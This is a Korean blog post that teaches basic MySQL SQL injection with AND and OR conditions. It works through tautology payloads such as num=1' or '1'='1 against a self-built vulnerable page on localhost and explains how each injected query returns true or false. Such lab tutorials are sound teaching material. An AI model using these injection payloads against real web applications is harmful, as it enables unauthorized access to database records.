일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
- intelmac
- 채팅환전사기
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- 모의해킹
- shell_gpt
- react
- 중고나라
- CryptoJS
- self-signed
- esbuild
- Malware Sample
- 네이버카페
- ssrf
- XSS
- ue4dumper
- Sequoia
- speed-measure-webpack-plugin
- 취약점
- NUGU
- open redirect
- 척추관협착증
- 로맨스스캠
- 허리디스크
- 안전결제
- 많다..
- 변태는
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- Frida
- 거래사기
- Today
- Total
annyoung
MySQL SQL Injection 기초(and, or) 본문
http://wh1ant.kr/archives/[Hangul] False SQL injection and Advanced blind SQL injection.txt
시작하기전 위 내용에 나와있는 소스를 사용 및 수정하여 vunlerable web application을 구성하고 포스팅 하였습니다.
AND |
127.0.0.1/info.php?num=1' and '1'='1 (True)
Query : select * from users where num='1' and '1'='1'
Users테이블에서 num이 1인것 그리고 1이 1과 같다면 출력해라.
And의 경우 앞과 뒤 모두 참이어야 합니다.
127.0.0.1/info.php?num=1' and '1'<'1 (False)
Query : select * from users where num='1' and '1'<'1'
Users테이블에서 num이 1인것 그리고 1이 1보다 크다면 출력해라.
둘중에 하나라도 거짓이라면 출력되지 않습니다.
OR |
127.0.0.1/info.php?num=1' or '1'='1;
Query : select * from users where num='1' or '1'='1'
Users라는 테이블에서 num이 1인것 또는 1=1이 같다면 출력해라.
1과 1은 같기 때문에 모두 출력합니다.
127.0.0.1/info.php?num=1' or '1'>'1;
Query : select * from users where num='1' or '1'>'1'
Users라는 테이블에서 num이 1인것 또는 1이 1보다 크다면 출력해라.
1>1은 False이므로 num이 1인것만 출력되었습니다.
'웹' 카테고리의 다른 글
IIS, Webdav 침해사고 당하는 이유중 하나 (0) | 2015.11.25 |
---|---|
webdav bypass method (0) | 2015.01.06 |
Web Exploit Tool Kit.pdf (2) | 2014.03.18 |
MSSQL SQL injection cheat sheet (0) | 2014.03.13 |
MySQL SQL injection cheat sheet (0) | 2014.03.12 |